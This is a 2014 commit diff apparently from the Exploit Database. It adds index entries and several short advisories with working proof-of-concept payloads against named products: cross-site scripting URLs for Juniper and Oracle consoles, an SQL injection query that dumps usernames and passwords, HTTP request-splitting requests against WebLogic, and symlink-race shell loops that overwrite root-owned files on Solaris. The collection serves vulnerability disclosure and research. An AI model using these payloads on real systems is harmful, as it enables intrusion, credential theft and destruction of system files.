Updated 08_12_2014

Offensive Security · Offensive Security · commit 77dff34f06e8 · 2014-08-12T04:39:36.000Z
diff --git a/files.csv b/files.csv
@@ -30872,6 +30872,8 @@ id,file,description,date,author,platform,type,port
 34271,platforms/multiple/remote/34271.txt,"id Software id Tech 4 Engine 'key' Packet Remote Code Execution Vulnerability",2010-07-05,"Luigi Auriemma",multiple,remote,0
 34272,platforms/windows/local/34272.py,"Symantec Endpoint Protection 11.x, 12.x - Kernel Pool Overflow",2014-08-05,"ryujin & sickness",windows,local,0
 34275,platforms/php/webapps/34275.txt,"Pro Chat Rooms 8.2.0 - Multiple Vulnerabilities",2014-08-06,"Mike Manzotti",php,webapps,80
+34278,platforms/linux/dos/34278.txt,"LibTIFF <= 3.9.4 - Out-Of-Order Tag Type Mismatch Remote Denial of Service Vulnerability",2010-07-12,"Tom Lane",linux,dos,0
+34279,platforms/linux/dos/34279.txt,"LibTIFF <= 3.9.4 - Unknown Tag Second Pass Processing Remote Denial of Service Vulnerability",2010-06-14,"Tom Lane",linux,dos,0
 34280,platforms/php/webapps/34280.txt,"PHPFABER CMS 2.0.5 Multiple Cross-Site Scripting Vulnerabilities",2010-07-04,prodigy,php,webapps,0
 34281,platforms/windows/dos/34281.py,"MP3 Cutter 1.8 MP3 File Processing Remote Denial of Service Vulnerability",2010-07-09,"Prashant Uniyal",windows,dos,0
 34282,platforms/php/webapps/34282.txt,"Real Estate Manager 1.0.1 'index.php' Cross-Site Scripting Vulnerability",2010-07-09,bi0,php,webapps,0
@@ -30881,6 +30883,7 @@ id,file,description,date,author,platform,type,port
 34286,platforms/php/webapps/34286.txt,"SimpNews 2.47.3 Multiple Cross Site Scripting Vulnerabilities",2010-07-09,MustLive,php,webapps,0
 34287,platforms/php/webapps/34287.txt,"Yappa 3.1.2 'yappa.php' Multiple Remote Command Execution Vulnerabilities",2010-07-09,"Sn!pEr.S!Te Hacker",php,webapps,0
 34288,platforms/php/webapps/34288.txt,"pragmaMX 0.1.11 'modules.php' Multiple SQL Injection Vulnerabilities",2009-12-22,"Hadi Kiamarsi",php,webapps,0
+34289,platforms/php/webapps/34289.txt,"Web Cocoon simpleCMS - 'show.php' SQL Injection Vulnerability",2009-12-21,anonymous,php,webapps,0
 34290,platforms/java/webapps/34290.txt,"Mac's CMS 1.1.4 'searchString' Parameter Cross Site Scripting Vulnerability",2010-07-11,10n1z3d,java,webapps,0
 34291,platforms/php/webapps/34291.txt,"Joomla! Rapid-Recipe Component HTML Injection Vulnerability",2010-07-10,Sid3^effects,php,webapps,0
 34292,platforms/php/webapps/34292.txt,"eliteCMS 1.01 Multiple Cross Site Scripting Vulnerabilities",2010-07-10,10n1z3d,php,webapps,0
@@ -30899,3 +30902,11 @@ id,file,description,date,author,platform,type,port
 34306,platforms/hardware/dos/34306.txt,"SHARP MX Series - Denial of Service",2014-08-09,pws,hardware,dos,23
 34307,platforms/hardware/dos/34307.txt,"Sky Broadband Router SR101 - Weak WPA-PSK Generation Algorithm",2014-08-09,"Matt O'Connor",hardware,dos,0
 34308,platforms/php/webapps/34308.txt,"TomatoCart 1.x - SQL Injection Vulnerability",2014-08-09,Breaking.Technology,php,webapps,80
+34309,platforms/solaris/dos/34309.txt,"Oracle Solaris 'rdist' Local Privilege Escalation Vulnerability",2010-07-13,"Monarch Rich",solaris,dos,0
+34310,platforms/multiple/remote/34310.txt,"Oracle Business Process Management <= 10.3.2 Cross Site Scripting Vulnerability",2010-07-13,Markot,multiple,remote,0
+34311,platforms/solaris/local/34311.sh,"Oracle Solaris 8/9/10 'flar' Insecure Temporary File Creation Vulnerability",2010-07-12,"Frank Stuart",solaris,local,0
+34312,platforms/multiple/remote/34312.txt,"Oracle WebLogic Server <= 10.3.3 Encoded URL Remote Vulnerability",2010-07-13,"Timothy D. Morgan",multiple,remote,0
+34313,platforms/solaris/local/34313.txt,"Oracle Solaris 'nfslogd' Insecure Temporary File Creation Vulnerability",2010-07-13,"Frank Stuart",solaris,local,0
+34314,platforms/solaris/local/34314.sh,"Oracle Solaris Management Console WBEM Insecure Temporary File Creation Vulnerability",2010-07-13,"Frank Stuart",solaris,local,0
+34315,platforms/php/webapps/34315.txt,"The Next Generation of Genealogy Sitebuilding 'searchform.php' Cross Site Scripting Vulnerability",2009-12-14,bi0,php,webapps,0
+34316,platforms/hardware/remote/34316.txt,"Juniper Networks SA2000 SSL VPN Appliance 'welcome.cgi' Cross Site Scripting Vulnerability",2010-06-09,"Richard Brain",hardware,remote,0
diff --git a/platforms/hardware/remote/34316.txt b/platforms/hardware/remote/34316.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/41664/info
+
+Juniper Networks SA2000 SSL VPN appliance is prone to a cross-site scripting vulnerability because the web interface fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Juniper Networks SA2000 running IVE OS 6.5R1 (Build 14599) are vulnerable; other models and versions may also be affected. 
+
+http://www.example.com/dana-na/auth/url_default/welcome.cgi?p=logout&c=37&u=</script><script>alert(1)</script>
diff --git a/platforms/linux/dos/34278.txt b/platforms/linux/dos/34278.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/41475/info
+
+LibTIFF is prone to a denial-of-service vulnerability because it fails to properly validate user-supplied input.
+
+An attacker can exploit this issue to crash an application that uses the vulnerable library, denying service to legitimate users. 
+
+http://www.exploit-db.com/sploits/34278.tif
diff --git a/platforms/linux/dos/34279.txt b/platforms/linux/dos/34279.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/41477/info
+
+LibTIFF is prone to a denial-of-service vulnerability because it fails to properly validate user-supplied input.
+
+An attacker can exploit this issue to crash an application that uses the vulnerable library, denying service to legitimate users. 
+
+http://www.exploit-db.com/sploits/34279.tif
diff --git a/platforms/multiple/remote/34310.txt b/platforms/multiple/remote/34310.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/41617/info
+
+Oracle Business Process Management is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+This vulnerability affects the following supported versions:
+5.7 MP3, 6.0 MP5, 10.3 MP2
+
+http://www.example.com:8585/webconsole/faces/faces/faces/jsf/tips.jsp?context=<script>alert(document.cookie)</script>
+http://www.example.com:8585/webconsole/faces/faces/faces/jsf/tips.jsp?context=<script>alert('CorelanTeam')</script> 
diff --git a/platforms/multiple/remote/34312.txt b/platforms/multiple/remote/34312.txt
@@ -0,0 +1,18 @@
+source: http://www.securityfocus.com/bid/41620/info
+
+Oracle WebLogic Server is prone to a remote vulnerability.
+
+The vulnerability can be exploited over the 'HTTP' protocol. For an exploit to succeed, the attacker must have 'Plugins for Apache, Sun and IIS web servers' privileges.
+
+This vulnerability affects the following supported versions:
+7.0 SP7, 8.1 SP6, 9.0, 9.1, 9.2 MP3, 10.0 MP2, 10.3.2, 10.3.3 
+
+The following example requests are available:
+
+GET /logo.gif%20HTTP/1.1%0d%0aX-hdr:%20x HTTP/1.1
+Host: vulnerable.example.com
+Connection: close
+
+GET /logo.gif%20HTTP/1.1%0d%0aHost:%20vulnerable.example.com%0d%0a%0d%0aGET%20/inject.gif HTTP/1.1
+Host: vulnerable.example.com
+
diff --git a/platforms/php/webapps/34289.txt b/platforms/php/webapps/34289.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/41526/info
+
+Web Cocoon simpleCMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+http://www.example.com/content/post/show.php?id=xek' union select null,concat_ws(0x3a,username,password),null,null,n ull,null,null,null,null,null,null,null,null,null,n ull,null from user -- &mode=post&gfile=show 
diff --git a/platforms/php/webapps/34315.txt b/platforms/php/webapps/34315.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/41656/info
+
+The Next Generation of Genealogy Sitebuilding is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+The Next Generation of Genealogy Sitebuilding 7.1.2 is vulnerable. 
+
+http://www.example.com/searchform.php?msg="/><script>alert('XSS')</script> 
diff --git a/platforms/solaris/dos/34309.txt b/platforms/solaris/dos/34309.txt
@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/41612/info
+
+Oracle Solaris is prone to a local privilege-escalation vulnerability.
+
+Local attackers can exploit this issue to execute arbitrary code with superuser privileges. Successfully exploiting this issue will result in the complete compromise of affected computers.
+
+The following products are affected:
+
+Solaris 10
+OpenSolaris 
+
+/usr/bin/rdist -cDwh file_that_is_hardlink rlogin_host:LONG_STRING 
diff --git a/platforms/solaris/local/34311.sh b/platforms/solaris/local/34311.sh
@@ -0,0 +1,18 @@
+source: http://www.securityfocus.com/bid/41619/info
+
+Oracle Solaris is prone to an insecure temporary file creation vulnerability.
+
+A local attacker can exploit this issue to overwrite arbitrary files with the privileges of the affected process. This will likely result in denial-of-service conditions, other attacks may also be possible.
+
+Oracle Solaris 8, 9 and 10 are vulnerable. 
+
+
+   $ x=0
+   $ while [ "$x" -le 30000 ];do
+   > ln -s /etc/important /tmp/.flash_filter_one_.$x
+   > x=$(expr "$x" + 1)
+   > done
+
+Later, when root creates a flash archive with:
+
+   # flar create -n junk `pwd`/junk.flar
diff --git a/platforms/solaris/local/34313.txt b/platforms/solaris/local/34313.txt
@@ -0,0 +1,19 @@
+source: http://www.securityfocus.com/bid/41637/info
+
+Oracle Solaris is prone to an insecure temporary file creation vulnerability.
+
+A local attacker can exploit this issue to overwrite arbitrary files with the privileges of the affected process. This will likely result in denial-of-service conditions, other attacks may also be possible.
+
+This vulnerability affects the following supported versions:
+8, 9, 10, OpenSolaris 
+
+nnDon't Panic! # ls -dl /etc/oops
+/etc/oops: No such file or directory
+Don't Panic! # ls -dl /tmp/.nfslogd.pid
+lrwxrwxrwx   1 nobody   nobody         9 Dec 29 21:24 /tmp/.nfslogd.pid
+-> /etc/oops
+Don't Panic! # id
+uid=0(root) gid=0(root)
+Don't Panic! # /usr/lib/nfs/nfslogd
+Don't Panic! # ls -dl /etc/oops
+-rw-------   1 root     root           4 Dec 29 21:25 /etc/oops
diff --git a/platforms/solaris/local/34314.sh b/platforms/solaris/local/34314.sh
@@ -0,0 +1,22 @@
+source: http://www.securityfocus.com/bid/41642/info
+
+The 'Solaris Management Console' sub component of Oracle Solaris creates temporary files in an insecure manner.
+
+An attacker with local access can exploit this issue to overwrite arbitrary files. This may result in denial-of-service conditions or could aid in other attacks.
+
+Solaris 9 and 10 are affected.
+
+   $ id
+   uid=101(fstuart) gid=14(sysadmin)
+   $ cd /tmp
+   $ x=0
+   $ while [ "$x" -ne 30000 ] ;do
+   > ln -s /etc/important /tmp/dummy.$x
+   > x=$(expr "$x" + 1)
+   > done
+   $ ls -dl /etc/important
+   -rw-r--r--   1 root     root          38 Jan  3 22:43 /etc/important
+   $ cat /etc/important
+      This is an important file!
+
+      EOF
